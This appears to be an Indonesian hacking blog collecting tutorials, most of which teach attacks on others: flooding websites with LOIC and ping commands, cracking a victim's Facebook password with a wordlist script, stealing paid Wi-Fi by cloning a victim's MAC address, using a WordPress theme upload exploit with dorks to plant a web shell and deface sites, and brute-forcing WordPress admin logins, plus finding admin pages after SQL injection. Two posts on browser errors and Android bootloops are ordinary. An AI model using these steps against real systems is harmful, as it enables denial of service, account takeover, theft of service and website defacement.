Rabu, 25 Januari 2017

Cara DDOS Website Agar Cepat Down with LOIC


serangan DDoS Attack adalah serangan yang dilakukan pada server dengan cara membanjiri server dengan request ping atau request lainya dalam jumlah yang sangat banyak. serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannonprogram ini tidak perlu diinstall cukup jalankan seperti program portable lainya.

Download Software nya DISINI
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested  dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.


cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1

system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.

CARA CRACK PASSWORD AKUN FACEBOOK MENGGUNAKAN KALI LINUX

ASSALLAMUALLAIKUM WR WB



Selamat sore para blogger mungkin kalian bertanya - tanya bagaimana sih caranya hack facebook
kali ini saya akan membahas bagaimana cara hack facebook menggunakan facebook.py
cara kerja dari facebook.py ini masih menggunakan tahap cracking jadi harus menggunakan kumpulan kata kunci yang berada di dalam wordlist
py dalam artian python dan menjalankannya harus menggunakan bahasa pemrograman python
kalau di kali linux atau Os pentest sudah tersedia

oke langsung saja

1. Download terlebih dahulu script facebook.py nya disini
    Jika belum memiliki wordlist bisa sedot disini dan taruh kedua file di file home

    Buka Terminal anda dan jalankan dengan perintah

     python facebook.py




2. Masukan username atau Id korban

    buka target anda
    dan ubah dari www menjadi graph

    copy username atau id korban
 
contoh :

Dan masukan username atau Id korban di tools facebook.py yang anda jalankan tadi
Masukan Wordlist anda

Contoh :
karena lokasi wordlist saya berada di file home jadi menggunakan perintah
/root/wordlist



Tunggu untuk mendapatkan password korban
jika sudah menapatkan password nanti tampilannya akan seperti ini



Dan Login

email gunakan username atau Id korban
dan password gunakan yang sudah anda dapatkan


Selamat Anda bisa Hack Facebook :)

Gunakan dengan Bijak
Kami tidak akan bertanggung jawab atas apa yang anda perbuat




Mohon maaf untuk pemilik akun ini :v


Mohon maaf ada kesalahan kata :)

CARA HACK @WIFI.ID MENGGUNAKAN KALI LINUX

Selamat malam para blogger
semoga di hari ini kalian semua sehat walafiat
Kali ini saya akan memperlihatkan bagaimana cara hack @wifi.id dengan cara mengkloning macc address kita dengan macc address korban menggunakan terminal di kali linux
kalo bisa gratisan ngapain bayar :D
hehehe
jika melakukan hal ini dosa di tanggung sendiri
oke langsung saja

1.buka terminal anda dan ketika perintah berikut :
   airmon-ng  >> yaitu fungsinya untuk melihat interface yang anda gunakan
  dan di kasus saya , interface yang saya gunakan adalah wlan0



2. dan ketikan perintah airmon-ng start wlan0 untuk menyalakan interface mon0


3. ketikan airodump-ng mon0 untuk melihat interface dan maccadress korban yang sedang terkoneksi dengan wifi id


berikut tampilan korban yang sedang terhubung dengan wifi id :D
dan copy macc address korban dan pastekan di macchanger
NOTE : CARI FRAME TERTINGGI KORBAN DI WIFI ID


4. seteleah itu tekan CTRL + C secara bersamaan, disini kita akan mengkloning macc address kita dengan korban
    dengan perintah sebagai berikut :
    ketikan perintah >> airmon-ng stop mon0 untuk mematika interface mon0 kita
    ketikan perintah >> ifconfig wlan0 down
    ketikan perintah >> macchanger -m maccadresskorban wlan0
    ketikan perintah >> ifconfig wlan0 up


5. setelah itu sambungkan internet ke wifi id
    selamat anda bisa internetan bersuka ria dengan kecepatan tinggi :D




MOHON MAAF JIKA ADA KESALAHAN KATA

Mencari Celah Website dengan Uniscan di Kali Linux

saya sekarang akan membahas Uniscan ;) tool scanner yang sudah tersedia di Kali Linux.

sebenernya di Kali Linux dan Backtrack juga ada tool scanner bernama W3af dan Vega ^_^, selebihnya cek di google :p , xixihi para pinguin pengendali naga yuk merapat ;)

Uniscan adalah scanner kerentanan untuk aplikasi web yang ditulis dalam bahasa pemrograman perl.dengan uniscan kita bisa mencari informasi tentang apakah sebuat situs mempunyai celah seperti xss,sqli,rfi/lfi.uniscan ini sudah tersedia di kali linux, jadi kita gak perlu install lagi :p
jadi dari penjelasaan di atas gak semua website yang bisa di scan ya ;)




untuk menscan buka terminal Linux anda
dan ketikan:
uniscan -u http://www.target.com -qweds
*www.target.com ganti dengan web yang ingin anda scan ;3
- lalu enter

fungsi options di atas adalah di gunakan untuk mencari
q -> directory
w -> file
e -> file robot.txt
d -> dynamic artinya mencari celah / bugs yg mungkin ada di site tersebut
s -> static

nanti saat di scan akan muncul terdapat informasi tentang domain apache, IP, directory dan file yang terdapat dalam situs tersebut, dan lain lain, banyak deh ^^

tunggu hingga scan selesai, jika selesai cari tulisan metode yang ada tulisan vuln nya

jika misalnya vuln nya menggunakan sql , yaudah langsung eksekusi aja ;)

Senin, 23 Januari 2017

Deface Dengan POC U-Design


Dork:inurl:/wp-content/themes/u-design/sliders/intext"kids"

Kembangin Sendiri "Gunakan Pikiran Kamu"


Exploit:/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

Vuln= Blank / KOSONG 

Csrf online : http://dukujuk.idwebs.info/autocsrf.php


        STEP:
1.Dorkin. 
Contoh:gct.com

2.Tambahkan Exploit Di Belakangnya. 

Contoh :gct.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

3.Jika Vuln Maka Akan Jadi Blank/Kosong


4.Setelah itu Kalian Masukan Ke Auto CSRF  

    Di Atas 

5.Setelah Itu Masukan Site Yang Vuln Tadi Contoh:gct.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

Dan Bagian Bawah FileData 

6.Jika Berhasil Kalian Akan Di Suruh 

   Mengupload Shell

7.Jika Berhasil Maka Akan Muncul Angka "1"

    Selain Angka Satu Tidak Bisa 

8. Setelah Muncul Angka "1" Kamu Hapus Exploit Yang Tadi Lalu Ganti Shell Kamu 
Contoh : gct.com/yourshell.phtml

9.Tebas Index 


10. Shoow off Deh 

 Thanks To :Mr. Face Gagak Cyber Team

Minggu, 22 Januari 2017

Cara Deface Website Menggunakan WpScan di Kali Linux.

Sebelum kita belajar ngedeface website kita harus mengenal dahulu apa itu deface website ???
Sekilas pengertian tentang deface, deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo lu adalah web master dan lu ngerubah tampilan halaman situs yang lu punya tentu saja itu nggak bisa disebut deface.
oke, ngga usah panjang lebar lagi mengenai pengertian/maksud ngedeface secara rinci (detail), karena lu bisa seaching ke  mbah google kalau lu mau lebih dalam lagi untuk mengetahui tentang deface. kita langsung cekidoot aja.. cara untuk ngedeface wesite menggunakan wpscan di kali linux…
Sebelum nya lu siapkan tools yang dibutuhkan :

  1. Kali Linux.exe >>> Download <<<
  2. WpBrute.exe >>> Download <<<
Oh iya perlu di ingat cara ini ane gunakan di jaringan local dengan web yang di buat dari wordpress.

 1.Tampilan target website yang belom dideface

                                 

domain webnya : http://192.168.1.1/webtes
2. Sekarang buka kali linux nya lalu klik kanan – pilih open terminal maka akan tampil terminal seperti cmd kalo di windows
Setelah terminal nya terbuka ketik alamat web target di terminal tersebut
Contoh : wpscan –url 192.168.1.1/webtes
Lihat gambar di bawah ini :

2.



3. Setelah selesai eksekusi nya maka lanjut ketik kode ini di panel
wpscan –url 192.168.1.1/webtes –enumerate u
fungsi dari code di atas untuk mengambil isi database yang berinisial username
lihat gambar di bawah ini :

4. Hasil dari eksekusi kode di atas seperti ini :
                       



5. Sekarang kita sudah dapet username dari web target yaitu admin, setelah itu buka folder     WPBforce nya dan jalankan WPBforcenya dengan cara tekan Shift+klik kanan untuk     membuka cmd di alamat itu, jangan lupa WPForcenya  simpan di C:/
Lihat gambar di bawah ini :
     

Di dalam cmd ketik WPBforce.exe –url=http://192.168.1.1/webtes –user=admin –pass=pass.txt –threads=50
Kode itu akan menjenerit pass.txt yang di dalamnya sudah berisi koleksi password.

6. Setelah itu takan enter maka akan tampil seperti di bawah ini :

                      


7. Jika sukses maka akan tampil seperti di bawah ini :
 


  


kamu sudah dapat username dan password dari web target, Sekarang kita coba
Masukan url 192.168.1.1/webtes/wp-login.php di browser
Maka akan tampil seperti di bawah ini Masukan username dan password yang tadi di dapat :








8. Setelah sukses login maka akan tampil dashbor website tersebut
Dan untuk eksekusi terakhir kita akan merubah tampilan awal dari web tersebut
Caranya lihat gambar di bawah ini :


9. lalu Buka Appearance – Editor

10. Sekarang cari Main Index  Template dan rubah kode di dalamnya dengan code html buatan kita sendiri, setelah kita ubah klik Update File
Dan buka kembali websitenya maka akan tampil halaman awal html yang kita buat pengganti index.php sebelumnya
Lihat hasil berikut :



Oke sip kan… gimana anda sukses ga ??? pasti sukses kan…
Sekian belajar cara deface website dasar menggunakan WpScan di Kali Linux.
Semoga bermanfaat, terima kasih udah mampir ke blog ane….
Repost by Adi_weigel

Mengatasi Error Saat Membuka Website

Assalamu'alaikum. Kali ini saya akan berbagi pengalaman saya tentang cara mengatasi error saat membuka blog. Beberapa waktu lalu saat lagi on-line, tiba-tiba browser saya nggak bisa buka "naruchigo.com" padahal saya saya pengen banget download kelanjutan anime naruto. Wah bingung juga karena udah nyobain tips dari internet tapi nggak selesai-selesai ni masalah. Kemudian saya coba mereset hisorynya ehh ternyata berhasil. Buat yang belum bisa, dapat ikutin langkah-langkahnya berikut ini :
     1.  Pada Mozilla Firefox
  • Buka mozilla firefox.
  • Setelah terbuka, klik "History" pada menubar paling atas.
  • Klik "Clear Recent History".
  • Setelah terbuka jendela clear recent history, pada "Time Range to Clear" pilih "Everything".
  • Klik "Clear Now".
     2.  Pada Internet Exploler
  • Buka Control Panel.
  • Klik "Network and Internet Connections".
  • Lalu klik "Internet Options".
  • Pada "Temporary Internet Files" klik "Delete Cookies", pada "History" klik "Clear History".
  • Terakhir klik Apply lalu klik Ok.
     3.  Pada Google Chrome
  • Buka Google Chrome.
  • Klik icon "Customize and control (seperti kunci inggris)" pada pojok kanan atas, lalu klik "History".
  • Klik "Clear All Browsing Data". 
  • Pada pilihan "Obliterate the following items from" pilih "the beginning of time".  
  • Lalu klik "Clear browsing data".
Jika cara diatas belum berhasil, coba ganti IP (Internet Protocol), dan DNS (Domain Name System) nya. Caranya sebagai berikut :
  1. Buka Control Panel.
  2. Klik "Network and Internet Connections".
  3. Klik "Network Connections".
  4. Pilih yang mana biasa anda gunakan, lalu klik kanan dan pilih "Properties".
  5. Setelah terbuka jendela klik tab "Networking".
  6. Pada "This connection uses the following items", klik "Internet Protocol (TCP/IP)", kemudian klik "Properties".
  7. Pada jendela Properties, klik pada "Obtain an IP address automatically", dan juga pada "Obtain DNS server address automatically"
  8. Terakhir, klik "OK" pada dua jendela yang terbuka.
Tutorial di atas saya buat berdasarkan windows xp, saya kira pada windows vista / windows 7 tidak jauh berbeda tapi kalau pada windows 8 saya belum tahu. Harap maklum kompi saya masih jadul.

Sekian dulu sedikit tips dari saya kali ini, mudah-mudahan bisa bermanfaat. Amiin...!!!

(weigel)

CARA MENCARI ADMIN LOGIN DI WEBSITE



 

 

Mencari halaman "Admin Login" kadang kala sangat sukar, Disini saya kongsikan sedikit tips yang mungkin membantu anda.Setelah sesuatu web terdedah kepada suntikan SQL (SQLI)  mungkin mudah untuk mendapat nama pengguna dan katalaluan, langkah seterusnya ialah  mencari halaman Log masuk "Admin Login" untuk masuk sebagai pemilik laman berkenaan.


Dibawah adalah beberapa kaedah / Tips untuk mencari halaman log masuk pentadbir "Admin Login"

1.Menambah Url


ni adalah kaedah yang pertama dan paling mudah untuk mencari laman login admin. Anda boleh menambah beberapa perkataan selepas URL.contoh:


www.site.com/admin
www.site.com/administrator
www.site.com/login
www.site.com/wp-login.php
www.site.com/admin.php

2.Mengguna Crawling software
Anda boleh menggunakan pelbagai alat jenis Crawling software untuk merangkak ke dalam laman web untuk mendapatkan halaman "Admin Login". ia mencari semua muka surat/page didalam laman web dan memaparkan senarai semua laman di direktori.

3.Robots.txt
pemilik laman web sebenarnya memberikan senarai pautan yang tidak boleh dicari oleh enjin pencarian "Search Engine".kadang kala pemilik akan menyembunyikan Halaman "Admin Login" Mereka pada robots.txt. secara langsung anda boleh melihat di fail robots.txt dengan menambah /robots.txt pada Url.
Contoh: www.site.com/robots.txt

4.Google Dork'
Ada juga boleh menggunakan google dork untuk mencari halaman "Admin Login" contoh seperti:
#Site:site.com “admin”
#Site:site.com inurl:login
#site:site.com intitle:"admin login"

5.Online
Terdapat juga beberapa laman web yang menyediakan perkhidmatan mencari halaman "Admin Login" secara online, anda juga boleh menggunakan laman web ini untuk mencari halaman "Admin Login" [Link+]

6.Havij
Havij merupakan salah satu software yang sangat popular sehingga ke hari ini,ia juga mempunyai pengimbas untuk membantu anda menemukan halaman "Admin Login"

7.Dan Banyak Lagi.

Sebagai Tindakan, anda mungkin dapat mencegah penggodam khasnya yang berniat jahat untuk masuk ke dalam halaman anda,Jadi cuba elakan  perkara yang tersenarai diatas dari ditemukan oleh mereka.

semuga bermanfaat bagi kalian : ) 

CARA MENGATASI BOOTLOOP PADA HP

Cara Mengatasi Android Bootloop, Mati Total, dan Tidak Mau Start – Smartphone Android bootloop, mati

 total, atau secara tiba-tiba tidak bisa restart seringkali terjadi dan dialami para pengguna Android. Masalah ini

kerap membuat panik, dan putus asa. Bagaimana cara mengatasi smartphone Android boot loop, atau mati total ?
Cara mengatasi Android bootloop paling sederhana dan mudah adalah mengembalikan ke “setelan pabrik”

atau “ Factory Reset “ melalui Recovery Mode.
Buat Anda yang belum tahu Factory Reset, perlu kami jelaskan, bahwa Factory Reset adalah mengembalikan

setelan smartphone Android pada kondisi awal, seperti saat

pertama kali beli, alias setelan langsung dari pabrik




Beberapa Jenis Bootloop Android yang pelu diketahui :
Pertama, Android Light Bootloop
Biasanya karena pengguna ponsel Android,tablet pada saat pemakain normal,Install Aplikasi, main game, dsb, tapi tiba-tiba Android, Tablet anda Reboot atau Restart otomatis, namun saat dihidupkan lagi hanya sampai logo saja dan berhenti disitu.
Kedua,Android Medium Bootloop
Biasa mucul akibat pengguna mengutak-atik Android dan masuk ke System Recovery, yang biasa digunakan untuk membuka system (rooting). Ini termasuk kategori kerusakan menengah.
Ketiga, Android Hard Bootloop
Android hard bootloop terjadi karena kita mengedit sricpt dalam Android . Contohnya, Meng-upgrade OS, biasanya jika kita bermaksud mengedit sricptnya kita harus rooting Android kita supaya bisa masuk ke system admin android. Bootloop Android jenis ini biasanya memiliki ciri saat dinyalakan hanya sampai logo saja, tak bergerak lagi.
Umumnya hampir setiap permasalahan pada HP dan tablet Android bisa diatasi dengan melakukan langkah Factory Reset. Namun, langkah ini bisa berdampak pada kehilangan data-data penting yang telah di-install sebelumnya, sehingga perlu melakukan install ulang.
Sebaiknya, lakukan Factory Reset sebagi opsi terakhir, jika semua alternatif solusi sudah dilakukan dan belum berhasil. Jika yakin, tidak ada solusi dan cara mengatasi android boot loop, mati total, atau tidak bisa start, maka Anda bisa melakukan langkah “Factory Reset” dengan cara berikut :

Cara mengatasi Android Bootloop

Masuk ke menu Setting>> Privacy >> Factory Data Reset
Jika smartphone/HP/Tablet Android mati total, sama sekali tidak mau restart, bagaimana cara mengatasinya ?.
Lakukan “Factory Reset” dengan melalui prosedur Recovery Mode.
Recovery Mode adalah, pilihan solusi melalui menu pilihan yang bisa digunakan untuk memperbaiki kerusakan software pada Android.
Tidak semua HP/tablet Android tersedia menu tersebut, maka bisa menggunakan buatan pihak lain, seperti ClockwordMod Recovery atau xRecovery .
Apa sih fungsi Recovery Mode. Jika Smartphone Android, tablet Android Anda mengalami masalah sebagai berikut :
  1. Jika tablet/HP Android tidak bisa start atau berhenti dan sampai di logo saja (biasa disebutbootloop Android). Hal ini disebabkan oleh beberapa faktor, misalnya akibat ada aplikasi error, bisa juga karena baru saja menginstall aplikasi yang tidak kompatibel dengan tipe handphone (dalam banyak kasus, setelah menginstall font changer).
  2. Dalam kasus HP/tablet/smartphone Android dapat dihidupkan, tapi tidak mau meresponinput dari pengguna, misalnya layar Android tidak mau disentuh atau tidak dapat masuk ke menu telepon / tablet.
  3. Bila Anda lupa PIN, Password atau Anda terlalu banyak melakukan percobaan menggambar pola (pattern) pengunci ponsel Android yang menyebabkan Anda tidak dapat masuk ke menu.
  4. Kerusakan-kerusakan software Android lainnya.

Cara Mengatasi Android bootloop, mati total, tidak mau start

Cara melakukan factory reset via recovery mode secara ringkas dapat dijalankan dengan dua langkah berikut.
Tahap 1: Masuk ke recovery mode
Masuk ke menu recovery mode Android, matikan dulu handphone / tabletnya > tekan dan tahan beberapa tombol Android secara bersamaan (misalnya tombol vol Up + Vol Down + power secara bersamaan) > selanjutnya masuk ke dalam recovery mode.
Catatan : Cara masuk recovery mode (tombol yang harus ditekan)  bisa berbeda-beda antara satu tipe HP dengan tipe lainnya.
Tampilan Recovery mode hanya berupa tulisan saja. Dalam menu recovery mode,  biasanya Anda tidak dapat menggunakan touch screen, atau tidak berfungsi. Untuk keperluan navigasi naik dan turun, Anda bisa menggunakan tombol volume (tergantung tipe handphone Android).
Tahap 2: Lakukan Wipe Data / Factory Reset
Setelah berada pada menu recovery mode, pilihlah fitur “Wipe Data / Factory Reset” selanjutnyarestart handphone Anda.
Untuk memudahkan Anda, berikut kami berikan contoh cara melakukan factory reset pada handphone Android Samsung Galaxy Young:
  1. Seabiknya daya baterai masih cukup (minimal 70%)
  2. Matikan handphone
  3. Tekan secara bersamaan dan tahan tombol Volume Up + tombol HOME + tombol Powerbeberapa detik > selanjutnya masuk ke menu recovery mode Android
  4. Gunakan tombol Volume, arahkan kursor hingga berada di tulisan “Factory reset / wipe data”
  5. Tekan tombol HOME untuk memulai proses > tunggu sesaat, dan harap sabar saat proses berlangsung
  6. Reboot handphone
Jika Anda mengalami boot loop pada handphone/tablet Android, demikian juga jika Anda lupa akanpassword atau pengunci pola handphone Android, yang perlu Anda lakukan hanyalah masuk ke recovery mode > lakukan Factory Reset / Wipe data. 
Untuk masuk ke dalam menu Recovery Mode, hanya dapat dilakukan pada kondisi handphone mati (off)
Pada masalah HP Android Bootloop, jika factory reset ternyata tidak bisa mengatasi masalah boot loop atau Android tetap tidak bisa masuk ke menu, maka solusi yang biasa dilakukan adalah dengan cara melakukan flash firmware, atau install ulang sistem operasi handphone).
Demikianlah penjelasan tentang cara mengatasi android bootloop, mati total, dan tidak mau start, semoga membantu memecahkan masalah yang sedang Anda hadapi.

Semoga Bermanfaat :)